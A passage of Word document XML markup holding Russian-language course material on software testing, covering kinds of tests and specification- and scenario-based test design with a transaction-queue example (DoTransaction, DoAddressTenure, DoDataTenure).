          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Типы тестирования</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">В </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
        </w:rPr>
        <w:t>тестовом плане</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> определяются и документируются различные типы тестов. Типы тестов могут быть классифицированы по двум категориям: по тому, что подвергается тестированию (по виду подсистемы) и по способу выбора входных данных.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Типы тестирования по виду подсистемы или продукта:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Тестирование основной функциональности</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, когда тестированию подвергается собственно система, являющаяся основным выпускаемым продуктом</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Тестирование инсталляции</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> включает тестирование сценариев первичной инсталляции системы, сценариев повторной инсталляции (поверх уже существующей копии), тестирование деинсталляции, тестирование инсталляции в условиях наличия ошибок в инсталлируемом пакете, в окружении или в сценарии и т.п.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Тестирование пользовательской документации</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> включает проверку полноты и понятности описания правил и особенностей использования продукта, наличие описания всех сценариев и функциональности, синтаксис и грамматику языка, работоспособность примеров и т.п.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Типы тестирования по способу выбора входных значений:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Функциональное тестирование</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>, при котором проверяется:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- Покрытие функциональных требований.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- Покрытие сценариев использования.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Стрессовое тестирование</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, при котором проверяются экстремальные режимы использования продукта.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Тестирование граничных значений</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Тестирование производительности</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Тестирование на соответствие стандартам</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Тестирование совместимости</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> с другими программно-аппаратными комплексами.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Тестирование работы с окружением</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Тестирование работы на конкретной платформе</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>В реальных разработках используются и комбинируются различные типы тестов для обеспечения спланированного качества продукта.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="168" w:name="sect8"/>
      <w:bookmarkEnd w:id="168"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Подходы к разработке тестов</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Рассмотрим разные подходы к разработке тестов, два к выбору тестовых данных и два к реализации тестового кода.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="169" w:name="sect9"/>
      <w:bookmarkEnd w:id="169"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Тестирование спецификации</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>При разработке тестов, основанных на функциональной спецификации продукта, требования к продукту являются основным источником, определяющим, какие тесты будут разработаны. Для каждого требования пишется один или более тестов, которые в совокупности должны проверить выполнение данного требования в продукте.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="170" w:name="sect10"/>
      <w:bookmarkEnd w:id="170"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Пример использования спецификации требований для разработки тестов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Пусть задан следующий фрагмент набора требований для модели обмена транзакциями:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Функция </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="texample"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DoTransaction</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> должна принимать адрес и данные в соответствии с параметрами, создавать в очереди новый элемент, заполнять его адресную часть и часть полей данных переданной информацией и инициировать транзакцию</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Функция </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="texample"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DoAddressTenure</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> должна принимать адрес в соответствии с параметрами, создавать в очереди новый элемент и заполнять его адресную часть</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Функция </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="texample"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DoDataTenure</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> должна принимать данные в соответствии с параметрами, находить в очереди первый элемент с частично незаполненными полями данных, дополнять его переданной информацией и инициировать транзакцию</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Концептуальное описание набора тестов, проверяющего спецификацию, может выглядеть следующим образом:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Вызвать </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="texample"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DoTransaction</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> с адресом и данными. Проверить появление в очереди еще одного элемента. Проверить появление на шине транзакции с правильными адресом и данными.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Вызвать </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="texample"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DoAddressTenure</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> с адресом. Проверить появление в очереди еще одного элемента. Проверить отсутствие новой транзакции на шине.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Вызвать </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="texample"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DoDataTenure</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> с данными. Проверить заполнение полей данных. Проверить появление на шине транзакции с правильными адресом и данными</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="171" w:name="sect11"/>
      <w:bookmarkEnd w:id="171"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Тестирование сценариев</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Разработка тестов, основанных на использовании сценариев, осуществляется по следующей методике:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Определяется модель использования, включающая операционное окружение продукта и «актеров». Актером может быть пользователь, другой продукт, аппаратная часть и тому подобное, то есть все, с чем продукт обменивается информацией. Разделение на окружение и актеров условно и служит для описания оптимальных способов использования продукта.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Разрабатываются сценарии использования продукта. Описание сценария в зависимости от продукта и выбранного подхода может быть строго определенным, параметризованным или разрешать некоторую степень неопределенности. Например, описание сценария на языке MSC допускает задание параметризованных сценариев с возможностью переупорядочивания событий.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Разрабатывается набор тестов, покрывающих заданные сценарии. С учетом степени неопределенности, заложенной в сценарии, каждый тест может покрывать один сценарий, несколько сценариев, или, наоборот, часть сценария.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Использование сценариев не требует наличия полной формальной спецификации требований, но зато может потребовать больше времени на разработку и анализ.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">Еще одна особенность </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
        </w:rPr>
        <w:t>тестирования сценариев</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> заключается в том, что этот метод направляет тестирование на проверку конкретных режимов использования продукта, что позволяет находить дефекты, которые метод тестирования по требованиям может пропустить.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="172" w:name="sect12"/>
      <w:bookmarkEnd w:id="172"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Пример использования спецификации требований для разработки тестов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Для рассмотренного выше примера возможно создание следующего сценария и тестов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
